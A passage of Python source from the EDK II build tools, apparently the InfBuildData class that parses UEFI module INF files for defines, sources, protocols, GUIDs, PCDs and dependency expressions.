"LINK" : "DLINK",
}
## Constructor of InfBuildData
#
# Initialize object of InfBuildData
#
# @param FilePath The path of platform description file
# @param RawData The raw data of DSC file
# @param BuildDataBase Database used to retrieve module/package information
# @param Arch The target architecture
# @param Platform The name of platform employing this module
# @param Macros Macros used for replacement in DSC file
#
def __init__(self, FilePath, RawData, BuildDatabase, Arch=TAB_ARCH_COMMON, Target=None, Toolchain=None):
self.MetaFile = FilePath
self._ModuleDir = FilePath.Dir
self._RawData = RawData
self._Bdb = BuildDatabase
self._Arch = Arch
self._Target = Target
self._Toolchain = Toolchain
self._Platform = TAB_COMMON
self._TailComments = None
self._BaseName = None
self._DxsFile = None
self._ModuleType = None
self._ComponentType = None
self._BuildType = None
self._Guid = None
self._Version = None
self._PcdIsDriver = None
self._BinaryModule = None
self._Shadow = None
self._MakefileName = None
self._CustomMakefile = None
self._Specification = None
self._LibraryClass = None
self._ModuleEntryPointList = None
self._ModuleUnloadImageList = None
self._ConstructorList = None
self._DestructorList = None
self._Defs = OrderedDict()
self._ProtocolComments = None
self._PpiComments = None
self._GuidsUsedByPcd = OrderedDict()
self._GuidComments = None
self._PcdComments = None
self._BuildOptions = None
self._DependencyFileList = None
self.LibInstances = []
self.ReferenceModules = set()
def SetReferenceModule(self,Module):
self.ReferenceModules.add(Module)
return self
## XXX[key] = value
def __setitem__(self, key, value):
self.__dict__[self._PROPERTY_[key]] = value
## value = XXX[key]
def __getitem__(self, key):
return self.__dict__[self._PROPERTY_[key]]
## "in" test support
def __contains__(self, key):
return key in self._PROPERTY_
## Get current effective macros
@cached_property
def _Macros(self):
RetVal = {}
return RetVal
## Get architecture
@cached_property
def Arch(self):
return self._Arch
## Return the name of platform employing this module
@cached_property
def Platform(self):
return self._Platform
@cached_property
def HeaderComments(self):
return [a[0] for a in self._RawData[MODEL_META_DATA_HEADER_COMMENT]]
@cached_property
def TailComments(self):
return [a[0] for a in self._RawData[MODEL_META_DATA_TAIL_COMMENT]]
## Retrieve all information in [Defines] section
#
# (Retrieving all [Defines] information in one-shot is just to save time.)
#
@cached_class_function
def _GetHeaderInfo(self):
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch, self._Platform]
for Record in RecordList:
Name, Value = Record[1], ReplaceMacro(Record[2], self._Macros, False)
# items defined _PROPERTY_ don't need additional processing
if Name in self:
self[Name] = Value
self._Defs[Name] = Value
self._Macros[Name] = Value
# some special items in [Defines] section need special treatment
elif Name in ('EFI_SPECIFICATION_VERSION', 'UEFI_SPECIFICATION_VERSION', 'EDK_RELEASE_VERSION', 'PI_SPECIFICATION_VERSION'):
if Name in ('EFI_SPECIFICATION_VERSION', 'UEFI_SPECIFICATION_VERSION'):
Name = 'UEFI_SPECIFICATION_VERSION'
if self._Specification is None:
self._Specification = OrderedDict()
self._Specification[Name] = GetHexVerValue(Value)
if self._Specification[Name] is None:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED,
"'%s' format is not supported for %s" % (Value, Name),
File=self.MetaFile, Line=Record[-1])
elif Name == 'LIBRARY_CLASS':
if self._LibraryClass is None:
self._LibraryClass = []
ValueList = GetSplitValueList(Value)
LibraryClass = ValueList[0]
if len(ValueList) > 1:
SupModuleList = GetSplitValueList(ValueList[1], ' ')
else:
SupModuleList = SUP_MODULE_LIST
self._LibraryClass.append(LibraryClassObject(LibraryClass, SupModuleList))
elif Name == 'ENTRY_POINT':
if self._ModuleEntryPointList is None:
self._ModuleEntryPointList = []
self._ModuleEntryPointList.append(Value)
elif Name == 'UNLOAD_IMAGE':
if self._ModuleUnloadImageList is None:
self._ModuleUnloadImageList = []
if not Value:
continue
self._ModuleUnloadImageList.append(Value)
elif Name == 'CONSTRUCTOR':
if self._ConstructorList is None:
self._ConstructorList = []
if not Value:
continue
self._ConstructorList.append(Value)
elif Name == 'DESTRUCTOR':
if self._DestructorList is None:
self._DestructorList = []
if not Value:
continue
self._DestructorList.append(Value)
elif Name == TAB_INF_DEFINES_CUSTOM_MAKEFILE:
TokenList = GetSplitValueList(Value)
if self._CustomMakefile is None:
self._CustomMakefile = {}
if len(TokenList) < 2:
self._CustomMakefile[TAB_COMPILER_MSFT] = TokenList[0]
self._CustomMakefile['GCC'] = TokenList[0]
else:
if TokenList[0] not in [TAB_COMPILER_MSFT, 'GCC']:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED,
"No supported family [%s]" % TokenList[0],
File=self.MetaFile, Line=Record[-1])
self._CustomMakefile[TokenList[0]] = TokenList[1]
else:
self._Defs[Name] = Value
self._Macros[Name] = Value
#
# Retrieve information in sections specific to Edk.x modules
#
if not self._ModuleType:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE,
"MODULE_TYPE is not given", File=self.MetaFile)
if self._ModuleType not in SUP_MODULE_LIST:
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch, self._Platform]
for Record in RecordList:
Name = Record[1]
if Name == "MODULE_TYPE":
LineNo = Record[6]
break
EdkLogger.error("build", FORMAT_NOT_SUPPORTED,
"MODULE_TYPE %s is not supported for EDK II, valid values are:\n %s" % (self._ModuleType, ' '.join(l for l in SUP_MODULE_LIST)),
File=self.MetaFile, Line=LineNo)
if (self._Specification is None) or (not 'PI_SPECIFICATION_VERSION' in self._Specification) or (int(self._Specification['PI_SPECIFICATION_VERSION'], 16) < 0x0001000A):
if self._ModuleType == SUP_MODULE_SMM_CORE:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "SMM_CORE module type can't be used in the module with PI_SPECIFICATION_VERSION less than 0x0001000A", File=self.MetaFile)
if (self._Specification is None) or (not 'PI_SPECIFICATION_VERSION' in self._Specification) or (int(self._Specification['PI_SPECIFICATION_VERSION'], 16) < 0x00010032):
if self._ModuleType == SUP_MODULE_MM_CORE_STANDALONE:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "MM_CORE_STANDALONE module type can't be used in the module with PI_SPECIFICATION_VERSION less than 0x00010032", File=self.MetaFile)
if self._ModuleType == SUP_MODULE_MM_STANDALONE:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "MM_STANDALONE module type can't be used in the module with PI_SPECIFICATION_VERSION less than 0x00010032", File=self.MetaFile)
if 'PCI_DEVICE_ID' in self._Defs and 'PCI_VENDOR_ID' in self._Defs \
and 'PCI_CLASS_CODE' in self._Defs and 'PCI_REVISION' in self._Defs:
self._BuildType = 'UEFI_OPTIONROM'
if 'PCI_COMPRESS' in self._Defs:
if self._Defs['PCI_COMPRESS'] not in ('TRUE', 'FALSE'):
EdkLogger.error("build", FORMAT_INVALID, "Expected TRUE/FALSE for PCI_COMPRESS: %s" % self.MetaFile)
elif 'UEFI_HII_RESOURCE_SECTION' in self._Defs \
and self._Defs['UEFI_HII_RESOURCE_SECTION'] == 'TRUE':
self._BuildType = 'UEFI_HII'
else:
self._BuildType = self._ModuleType.upper()
if self._DxsFile:
File = PathClass(NormPath(self._DxsFile), self._ModuleDir, Arch=self._Arch)
# check the file validation
ErrorCode, ErrorInfo = File.Validate(".dxs", CaseSensitive=False)
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo,
File=self.MetaFile, Line=LineNo)
if not self._DependencyFileList:
self._DependencyFileList = []
self._DependencyFileList.append(File)
## Retrieve file version
@cached_property
def AutoGenVersion(self):
RetVal = 0x00010000
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch, self._Platform]
for Record in RecordList:
if Record[1] == TAB_INF_DEFINES_INF_VERSION:
if '.' in Record[2]:
ValueList = Record[2].split('.')
Major = '%04o' % int(ValueList[0], 0)
Minor = '%04o' % int(ValueList[1], 0)
RetVal = int('0x' + Major + Minor, 0)
else:
RetVal = int(Record[2], 0)
break
return RetVal
## Retrieve BASE_NAME
@cached_property
def BaseName(self):
if self._BaseName is None:
self._GetHeaderInfo()
if self._BaseName is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No BASE_NAME name", File=self.MetaFile)
return self._BaseName
## Retrieve DxsFile
@cached_property
def DxsFile(self):
if self._DxsFile is None:
self._GetHeaderInfo()
if self._DxsFile is None:
self._DxsFile = ''
return self._DxsFile
## Retrieve MODULE_TYPE
@cached_property
def ModuleType(self):
if self._ModuleType is None:
self._GetHeaderInfo()
if self._ModuleType is None:
self._ModuleType = SUP_MODULE_BASE
if self._ModuleType not in SUP_MODULE_LIST:
self._ModuleType = SUP_MODULE_USER_DEFINED
return self._ModuleType
## Retrieve COMPONENT_TYPE
@cached_property
def ComponentType(self):
if self._ComponentType is None:
self._GetHeaderInfo()
if self._ComponentType is None:
self._ComponentType = SUP_MODULE_USER_DEFINED
return self._ComponentType
## Retrieve "BUILD_TYPE"
@cached_property
def BuildType(self):
if self._BuildType is None:
self._GetHeaderInfo()
if not self._BuildType:
self._BuildType = SUP_MODULE_BASE
return self._BuildType
## Retrieve file guid
@cached_property
def Guid(self):
if self._Guid is None:
self._GetHeaderInfo()
if self._Guid is None:
self._Guid = '00000000-0000-0000-0000-000000000000'
return self._Guid
## Retrieve module version
@cached_property
def Version(self):
if self._Version is None:
self._GetHeaderInfo()
if self._Version is None:
self._Version = '0.0'
return self._Version
## Retrieve PCD_IS_DRIVER
@cached_property
def PcdIsDriver(self):
if self._PcdIsDriver is None:
self._GetHeaderInfo()
if self._PcdIsDriver is None:
self._PcdIsDriver = ''
return self._PcdIsDriver
## Retrieve SHADOW
@cached_property
def Shadow(self):
if self._Shadow is None:
self._GetHeaderInfo()
if self._Shadow and self._Shadow.upper() == 'TRUE':
self._Shadow = True
else:
self._Shadow = False
return self._Shadow
## Retrieve CUSTOM_MAKEFILE
@cached_property
def CustomMakefile(self):
if self._CustomMakefile is None:
self._GetHeaderInfo()
if self._CustomMakefile is None:
self._CustomMakefile = {}
return self._CustomMakefile
## Retrieve EFI_SPECIFICATION_VERSION
@cached_property
def Specification(self):
if self._Specification is None:
self._GetHeaderInfo()
if self._Specification is None:
self._Specification = {}
return self._Specification
## Retrieve LIBRARY_CLASS
@cached_property
def LibraryClass(self):
if self._LibraryClass is None:
self._GetHeaderInfo()
if self._LibraryClass is None:
self._LibraryClass = []
return self._LibraryClass
## Retrieve ENTRY_POINT
@cached_property
def ModuleEntryPointList(self):
if self._ModuleEntryPointList is None:
self._GetHeaderInfo()
if self._ModuleEntryPointList is None:
self._ModuleEntryPointList = []
return self._ModuleEntryPointList
## Retrieve UNLOAD_IMAGE
@cached_property
def ModuleUnloadImageList(self):
if self._ModuleUnloadImageList is None:
self._GetHeaderInfo()
if self._ModuleUnloadImageList is None:
self._ModuleUnloadImageList = []
return self._ModuleUnloadImageList
## Retrieve CONSTRUCTOR
@cached_property
def ConstructorList(self):
if self._ConstructorList is None:
self._GetHeaderInfo()
if self._ConstructorList is None:
self._ConstructorList = []
return self._ConstructorList
## Retrieve DESTRUCTOR
@cached_property
def DestructorList(self):
if self._DestructorList is None:
self._GetHeaderInfo()
if self._DestructorList is None:
self._DestructorList = []
return self._DestructorList
## Retrieve definies other than above ones
@cached_property
def Defines(self):
self._GetHeaderInfo()
return self._Defs
## Retrieve binary files
@cached_class_function
def _GetBinaries(self):
RetVal = []
RecordList = self._RawData[MODEL_EFI_BINARY_FILE, self._Arch, self._Platform]
Macros = self._Macros
Macros['PROCESSOR'] = self._Arch
for Record in RecordList:
FileType = Record[0]
LineNo = Record[-1]
Target = TAB_COMMON
FeatureFlag = []
if Record[2]:
TokenList = GetSplitValueList(Record[2], TAB_VALUE_SPLIT)
if TokenList:
Target = TokenList[0]
if len(TokenList) > 1:
FeatureFlag = Record[1:]
File = PathClass(NormPath(Record[1], Macros), self._ModuleDir, '', FileType, True, self._Arch, '', Target)
# check the file validation
ErrorCode, ErrorInfo = File.Validate()
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo, File=self.MetaFile, Line=LineNo)
RetVal.append(File)
return RetVal
## Retrieve binary files with error check.
@cached_property
def Binaries(self):
RetVal = self._GetBinaries()
if GlobalData.gIgnoreSource and not RetVal:
ErrorInfo = "The INF file does not contain any RetVal to use in creating the image\n"
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE, ExtraData=ErrorInfo, File=self.MetaFile)
return RetVal
## Retrieve source files
@cached_property
def Sources(self):
self._GetHeaderInfo()
# Ignore all source files in a binary build mode
if GlobalData.gIgnoreSource:
return []
RetVal = []
RecordList = self._RawData[MODEL_EFI_SOURCE_FILE, self._Arch, self._Platform]
Macros = self._Macros
for Record in RecordList:
LineNo = Record[-1]
ToolChainFamily = Record[1]
TagName = Record[2]
ToolCode = Record[3]
File = PathClass(NormPath(Record[0], Macros), self._ModuleDir, '',
'', False, self._Arch, ToolChainFamily, '', TagName, ToolCode)
# check the file validation
ErrorCode, ErrorInfo = File.Validate()
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo, File=self.MetaFile, Line=LineNo)
RetVal.append(File)
# add any previously found dependency files to the source list
if self._DependencyFileList:
RetVal.extend(self._DependencyFileList)
return RetVal
## Retrieve library classes employed by this module
@cached_property
def LibraryClasses(self):
RetVal = OrderedDict()
RecordList = self._RawData[MODEL_EFI_LIBRARY_CLASS, self._Arch, self._Platform]
for Record in RecordList:
Lib = Record[0]
Instance = Record[1]
if Instance:
Instance = NormPath(Instance, self._Macros)
RetVal[Lib] = Instance
else:
RetVal[Lib] = None
return RetVal
## Retrieve library names (for Edk.x style of modules)
@cached_property
def Libraries(self):
RetVal = []
RecordList = self._RawData[MODEL_EFI_LIBRARY_INSTANCE, self._Arch, self._Platform]
for Record in RecordList:
LibraryName = ReplaceMacro(Record[0], self._Macros, False)
# in case of name with '.lib' extension, which is unusual in Edk.x inf
LibraryName = os.path.splitext(LibraryName)[0]
if LibraryName not in RetVal:
RetVal.append(LibraryName)
return RetVal
@cached_property
def ProtocolComments(self):
self.Protocols
return self._ProtocolComments
## Retrieve protocols consumed/produced by this module
@cached_property
def Protocols(self):
RetVal = OrderedDict()
self._ProtocolComments = OrderedDict()
RecordList = self._RawData[MODEL_EFI_PROTOCOL, self._Arch, self._Platform]
for Record in RecordList:
CName = Record[0]
Value = _ProtocolValue(CName, self.Packages, self.MetaFile.Path)
if Value is None:
PackageList = "\n\t".join(str(P) for P in self.Packages)
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
"Value of Protocol [%s] is not found under [Protocols] section in" % CName,
ExtraData=PackageList, File=self.MetaFile, Line=Record[-1])
RetVal[CName] = Value
CommentRecords = self._RawData[MODEL_META_DATA_COMMENT, self._Arch, self._Platform, Record[5]]
self._ProtocolComments[CName] = [a[0] for a in CommentRecords]
return RetVal
@cached_property
def PpiComments(self):
self.Ppis
return self._PpiComments
## Retrieve PPIs consumed/produced by this module
@cached_property
def Ppis(self):
RetVal = OrderedDict()
self._PpiComments = OrderedDict()
RecordList = self._RawData[MODEL_EFI_PPI, self._Arch, self._Platform]
for Record in RecordList:
CName = Record[0]
Value = _PpiValue(CName, self.Packages, self.MetaFile.Path)
if Value is None:
PackageList = "\n\t".join(str(P) for P in self.Packages)
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
"Value of PPI [%s] is not found under [Ppis] section in " % CName,
ExtraData=PackageList, File=self.MetaFile, Line=Record[-1])
RetVal[CName] = Value
CommentRecords = self._RawData[MODEL_META_DATA_COMMENT, self._Arch, self._Platform, Record[5]]
self._PpiComments[CName] = [a[0] for a in CommentRecords]
return RetVal
@cached_property
def GuidComments(self):
self.Guids
return self._GuidComments
## Retrieve GUIDs consumed/produced by this module
@cached_property
def Guids(self):
RetVal = OrderedDict()
self._GuidComments = OrderedDict()
RecordList = self._RawData[MODEL_EFI_GUID, self._Arch, self._Platform]
for Record in RecordList:
CName = Record[0]
Value = GuidValue(CName, self.Packages, self.MetaFile.Path)
if Value is None:
PackageList = "\n\t".join(str(P) for P in self.Packages)
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
"Value of Guid [%s] is not found under [Guids] section in" % CName,
ExtraData=PackageList, File=self.MetaFile, Line=Record[-1])
RetVal[CName] = Value
CommentRecords = self._RawData[MODEL_META_DATA_COMMENT, self._Arch, self._Platform, Record[5]]
self._GuidComments[CName] = [a[0] for a in CommentRecords]
for Type in [MODEL_PCD_FIXED_AT_BUILD,MODEL_PCD_PATCHABLE_IN_MODULE,MODEL_PCD_FEATURE_FLAG,MODEL_PCD_DYNAMIC,MODEL_PCD_DYNAMIC_EX]:
RecordList = self._RawData[Type, self._Arch, self._Platform]
for TokenSpaceGuid, _, _, _, _, _, LineNo in RecordList:
# get the guid value
if TokenSpaceGuid not in RetVal:
Value = GuidValue(TokenSpaceGuid, self.Packages, self.MetaFile.Path)
if Value is None:
PackageList = "\n\t".join(str(P) for P in self.Packages)
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
"Value of Guid [%s] is not found under [Guids] section in" % TokenSpaceGuid,
ExtraData=PackageList, File=self.MetaFile, Line=LineNo)
RetVal[TokenSpaceGuid] = Value
self._GuidsUsedByPcd[TokenSpaceGuid] = Value
return RetVal
## Retrieve include paths necessary for this module (for Edk.x style of modules)
@cached_property
def Includes(self):
RetVal = []
Macros = self._Macros
Macros['PROCESSOR'] = GlobalData.gEdkGlobal.get('PROCESSOR', self._Arch)
RecordList = self._RawData[MODEL_EFI_INCLUDE, self._Arch, self._Platform]
for Record in RecordList:
File = NormPath(Record[0], Macros)
if File[0] == '.':
File = os.path.join(self._ModuleDir, File)
else:
File = mws.join(GlobalData.gWorkspace, File)
File = RealPath(os.path.normpath(File))
if File:
RetVal.append(File)
return RetVal
## Retrieve packages this module depends on
@cached_property
def Packages(self):
RetVal = []
RecordList = self._RawData[MODEL_META_DATA_PACKAGE, self._Arch, self._Platform]
Macros = self._Macros
for Record in RecordList:
File = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
# check the file validation
ErrorCode, ErrorInfo = File.Validate('.dec')
if ErrorCode != 0:
LineNo = Record[-1]
EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo, File=self.MetaFile, Line=LineNo)
# parse this package now. we need it to get protocol/ppi/guid value
RetVal.append(self._Bdb[File, self._Arch, self._Target, self._Toolchain])
return RetVal
## Retrieve PCD comments
@cached_property
def PcdComments(self):
self.Pcds
return self._PcdComments
## Retrieve PCDs used in this module
@cached_property
def Pcds(self):
self._PcdComments = OrderedDict()
RetVal = OrderedDict()
RetVal.update(self._GetPcd(MODEL_PCD_FIXED_AT_BUILD))
RetVal.update(self._GetPcd(MODEL_PCD_PATCHABLE_IN_MODULE))
RetVal.update(self._GetPcd(MODEL_PCD_FEATURE_FLAG))
RetVal.update(self._GetPcd(MODEL_PCD_DYNAMIC))
RetVal.update(self._GetPcd(MODEL_PCD_DYNAMIC_EX))
return RetVal
@cached_property
def ModulePcdList(self):
RetVal = self.Pcds
return RetVal
@cached_property
def LibraryPcdList(self):
if bool(self.LibraryClass):
return []
RetVal = {}
Pcds = set()
for Library in self.LibInstances:
PcdsInLibrary = OrderedDict()
for Key in Library.Pcds:
if Key in self.Pcds or Key in Pcds:
continue
Pcds.add(Key)
PcdsInLibrary[Key] = copy.copy(Library.Pcds[Key])
RetVal[Library] = PcdsInLibrary
return RetVal
@cached_property
def PcdsName(self):
PcdsName = set()
for Type in (MODEL_PCD_FIXED_AT_BUILD,MODEL_PCD_PATCHABLE_IN_MODULE,MODEL_PCD_FEATURE_FLAG,MODEL_PCD_DYNAMIC,MODEL_PCD_DYNAMIC_EX):
RecordList = self._RawData[Type, self._Arch, self._Platform]
for TokenSpaceGuid, PcdCName, _, _, _, _, _ in RecordList:
PcdsName.add((PcdCName, TokenSpaceGuid))
return PcdsName
## Retrieve build options specific to this module
@cached_property
def BuildOptions(self):
if self._BuildOptions is None:
self._BuildOptions = OrderedDict()
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch, self._Platform]
for Record in RecordList:
ToolChainFamily = Record[0]
ToolChain = Record[1]
Option = Record[2]
if (ToolChainFamily, ToolChain) not in self._BuildOptions or Option.startswith('='):
self._BuildOptions[ToolChainFamily, ToolChain] = Option
else:
# concatenate the option string if they're for the same tool
OptionString = self._BuildOptions[ToolChainFamily, ToolChain]
self._BuildOptions[ToolChainFamily, ToolChain] = OptionString + " " + Option
return self._BuildOptions
## Retrieve dependency expression
@cached_property
def Depex(self):
RetVal = tdict(False, 2)
# If the module has only Binaries and no Sources, then ignore [Depex]
if not self.Sources and self.Binaries:
return RetVal
RecordList = self._RawData[MODEL_EFI_DEPEX, self._Arch]
# PEIM and DXE drivers must have a valid [Depex] section
if len(self.LibraryClass) == 0 and len(RecordList) == 0:
if self.ModuleType == SUP_MODULE_DXE_DRIVER or self.ModuleType == SUP_MODULE_PEIM or self.ModuleType == SUP_MODULE_DXE_SMM_DRIVER or \
self.ModuleType == SUP_MODULE_DXE_SAL_DRIVER or self.ModuleType == SUP_MODULE_DXE_RUNTIME_DRIVER:
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE, "No [Depex] section or no valid expression in [Depex] section for [%s] module" \
% self.ModuleType, File=self.MetaFile)
if len(RecordList) != 0 and (self.ModuleType == SUP_MODULE_USER_DEFINED or self.ModuleType == SUP_MODULE_HOST_APPLICATION):
for Record in RecordList:
if Record[4] not in [SUP_MODULE_PEIM, SUP_MODULE_DXE_DRIVER, SUP_MODULE_DXE_SMM_DRIVER]:
EdkLogger.error('build', FORMAT_INVALID,
"'%s' module must specify the type of [Depex] section" % self.ModuleType,
File=self.MetaFile)
TemporaryDictionary = OrderedDict()
for Record in RecordList:
DepexStr = ReplaceMacro(Record[0], self._Macros, False)
Arch = Record[3]
ModuleType = Record[4]
TokenList = DepexStr.split()
if (Arch, ModuleType) not in TemporaryDictionary:
TemporaryDictionary[Arch, ModuleType] = []
DepexList = TemporaryDictionary[Arch, ModuleType]
for Token in TokenList:
if Token in DEPEX_SUPPORTED_OPCODE_SET:
DepexList.append(Token)
elif Token.endswith(".inf"): # module file name
ModuleFile = os.path.normpath(Token)
Module = self.BuildDatabase[ModuleFile]
if Module is None:
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE, "Module is not found in active platform",
ExtraData=Token, File=self.MetaFile, Line=Record[-1])
DepexList.append(Module.Guid)
else:
# it use the Fixed PCD format
if '.' in Token:
if tuple(Token.split('.')[::-1]) not in self.Pcds:
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE, "PCD [{}] used in [Depex] section should be listed in module PCD section".format(Token), File=self.MetaFile, Line=Record[-1])
else:
if self.Pcds[tuple(Token.split('.')[::-1])].DatumType != TAB_VOID:
EdkLogger.error('build', FORMAT_INVALID, "PCD [{}] used in [Depex] section should be VOID* datum type".format(Token), File=self.MetaFile, Line=Record[-1])
Value = Token
else:
# get the GUID value now
Value = _ProtocolValue(Token, self.Packages, self.MetaFile.Path)
if Value is None:
Value = _PpiValue(Token, self.Packages, self.MetaFile.Path)
if Value is None:
Value = GuidValue(Token, self.Packages, self.MetaFile.Path)
if Value is None:
PackageList = "\n\t".join(str(P) for P in self.Packages)
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
"Value of [%s] is not found in" % Token,
ExtraData=PackageList, File=self.MetaFile, Line=Record[-1])
DepexList.append(Value)
for Arch, ModuleType in TemporaryDictionary:
RetVal[Arch, ModuleType] = TemporaryDictionary[Arch, ModuleType]
return RetVal
## Retrieve dependency expression
@cached_property
def DepexExpression(self):
RetVal = tdict(False, 2)
RecordList = self._RawData[MODEL_EFI_DEPEX, self._Arch]
TemporaryDictionary = OrderedDict()
for Record in RecordList:
DepexStr = ReplaceMacro(Record[0], self._Macros, False)
Arch = Record[3]
ModuleType = Record[4]
TokenList = DepexStr.split()
if (Arch, ModuleType) not in TemporaryDictionary:
TemporaryDictionary[Arch, ModuleType] = ''
for Token in TokenList:
TemporaryDictionary[Arch, ModuleType] = TemporaryDictionary[Arch, ModuleType] + Token.strip() + ' '
for Arch, ModuleType in TemporaryDictionary:
RetVal[Arch, ModuleType] = TemporaryDictionary[Arch, ModuleType]
return RetVal
def LocalPkg(self):
module_path = self.MetaFile.File
subdir = os.path.split(module_path)[0]
TopDir = ""
while subdir:
subdir,TopDir = os.path.split(subdir)
for file_name in os.listdir(os.path.join(self.MetaFile.Root,TopDir)):
if file_name.upper().endswith("DEC"):
pkg = os.path.join(TopDir,file_name)
return pkg
@cached_class_function
def GetGuidsUsedByPcd(self):
self.Guid
return self._GuidsUsedByPcd
## Retrieve PCD for given type
def _GetPcd(self, Type):
Pcds = OrderedDict()
PcdDict = tdict(True, 4)
PcdList = []
RecordList = self._RawData[Type, self._Arch, self._Platform]
for TokenSpaceGuid, PcdCName, Setting, Arch, Platform, Id, LineNo in RecordList:
PcdDict[Arch, Platform, PcdCName, TokenSpaceGuid] = (Setting, LineNo)
PcdList.append((PcdCName, TokenSpaceGuid))
CommentRecords = self._RawData[MODEL_META_DATA_COMMENT, self._Arch, self._Platform, Id]
Comments = []
for CmtRec in CommentRecords:
Comments.append(CmtRec[0])
self._PcdComments[TokenSpaceGuid, PcdCName] = Comments
# resolve PCD type, value, datum info, etc. by getting its definition from package
_GuidDict = self.Guids.copy()
for PcdCName, TokenSpaceGuid in PcdList:
PcdRealName = PcdCName
Setting, LineNo = PcdDict[self._Arch, self.Platform, PcdCName, TokenSpaceGuid]
if Setting is None:
continue
ValueList = AnalyzePcdData(Setting)
DefaultValue = ValueList[0]
Pcd = PcdClassObject(
PcdCName,
TokenSpaceGuid,
'',
'',
DefaultValue,
'',
'',
{},
False,
self.Guids[TokenSpaceGuid]
)
if Type == MODEL_PCD_PATCHABLE_IN_MODULE and ValueList[1]:
# Patch PCD: TokenSpace.PcdCName|Value|Offset
Pcd.Offset = ValueList[1]
if (PcdRealName, TokenSpaceGuid) in GlobalData.MixedPcd:
for Package in self.Packages:
for key in Package.Pcds:
if (Package.Pcds[key].TokenCName, Package.Pcds[key].TokenSpaceGuidCName) == (PcdRealName, TokenSpaceGuid):
for item in GlobalData.MixedPcd[(PcdRealName, TokenSpaceGuid)]:
Pcd_Type = item[0].split('_')[-1]
if Pcd_Type == Package.Pcds[key].Type:
Value = Package.Pcds[key]
Value.TokenCName = Package.Pcds[key].TokenCName + '_' + Pcd_Type
if len(key) == 2:
newkey = (Value.TokenCName, key[1])
elif len(key) == 3:
newkey = (Value.TokenCName, key[1], key[2])
del Package.Pcds[key]
Package.Pcds[newkey] = Value
break
else:
pass
else:
pass
# get necessary info from package declaring this PCD
for Package in self.Packages:
#
# 'dynamic' in INF means its type is determined by platform;
# if platform doesn't give its type, use 'lowest' one in the
# following order, if any
#
# TAB_PCDS_FIXED_AT_BUILD, TAB_PCDS_PATCHABLE_IN_MODULE, TAB_PCDS_FEATURE_FLAG, TAB_PCDS_DYNAMIC, TAB_PCDS_DYNAMIC_EX
#
_GuidDict.update(Package.Guids)
PcdType = self._PCD_TYPE_STRING_[Type]
if Type == MODEL_PCD_DYNAMIC:
Pcd.Pending = True
for T in PCD_TYPE_LIST:
if (PcdRealName, TokenSpaceGuid) in GlobalData.MixedPcd:
for item in GlobalData.MixedPcd[(PcdRealName, TokenSpaceGuid)]:
if str(item[0]).endswith(T) and (item[0], item[1], T) in Package.Pcds:
PcdType = T
PcdCName = item[0]
break
else:
pass
break
else:
if (PcdRealName, TokenSpaceGuid, T) in Package.Pcds:
PcdType = T
break
else:
Pcd.Pending = False
if (PcdRealName, TokenSpaceGuid) in GlobalData.MixedPcd:
for item in GlobalData.MixedPcd[(PcdRealName, TokenSpaceGuid)]:
Pcd_Type = item[0].split('_')[-1]
if Pcd_Type == PcdType:
PcdCName = item[0]
break
else:
pass
else:
pass
if (PcdCName, TokenSpaceGuid, PcdType) in Package.Pcds:
PcdInPackage = Package.Pcds[PcdCName, TokenSpaceGuid, PcdType]
Pcd.Type = PcdType
Pcd.TokenValue = PcdInPackage.TokenValue
#
# Check whether the token value exist or not.
#
if Pcd.TokenValue is None or Pcd.TokenValue == "":
EdkLogger.error(
'build',
FORMAT_INVALID,
"No TokenValue for PCD [%s.%s] in [%s]!" % (TokenSpaceGuid, PcdRealName, str(Package)),
File=self.MetaFile, Line=LineNo,
ExtraData=None
)
#
# Check hexadecimal token value length and format.
#
ReIsValidPcdTokenValue = re.compile(r"^[0][x|X][0]*[0-9a-fA-F]{1,8}$", re.DOTALL)
if Pcd.TokenValue.startswith("0x") or Pcd.TokenValue.startswith("0X"):
if ReIsValidPcdTokenValue.match(Pcd.TokenValue) is None:
EdkLogger.error(
'build',
FORMAT_INVALID,
"The format of TokenValue [%s] of PCD [%s.%s] in [%s] is invalid:" % (Pcd.TokenValue, TokenSpaceGuid, PcdRealName, str(Package)),
File=self.MetaFile, Line=LineNo,
ExtraData=None
)
#
# Check decimal token value length and format.
#
else:
try:
TokenValueInt = int (Pcd.TokenValue, 10)
if (TokenValueInt < 0 or TokenValueInt > 4294967295):
EdkLogger.error(
'build',
FORMAT_INVALID,
"The format of TokenValue [%s] of PCD [%s.%s] in [%s] is invalid, as a decimal it should between: 0 - 4294967295!" % (Pcd.TokenValue, TokenSpaceGuid, PcdRealName, str(Package)),
File=self.MetaFile, Line=LineNo,
ExtraData=None
)
except:
EdkLogger.error(
'build',
FORMAT_INVALID,
"The format of TokenValue [%s] of PCD [%s.%s] in [%s] is invalid, it should be hexadecimal or decimal!" % (Pcd.TokenValue, TokenSpaceGuid, PcdRealName, str(Package)),
File=self.MetaFile, Line=LineNo,
ExtraData=None
)
Pcd.DatumType = PcdInPackage.DatumType
Pcd.MaxDatumSize = PcdInPackage.MaxDatumSize
Pcd.InfDefaultValue = Pcd.DefaultValue
if not Pcd.DefaultValue:
Pcd.DefaultValue = PcdInPackage.DefaultValue
else:
try:
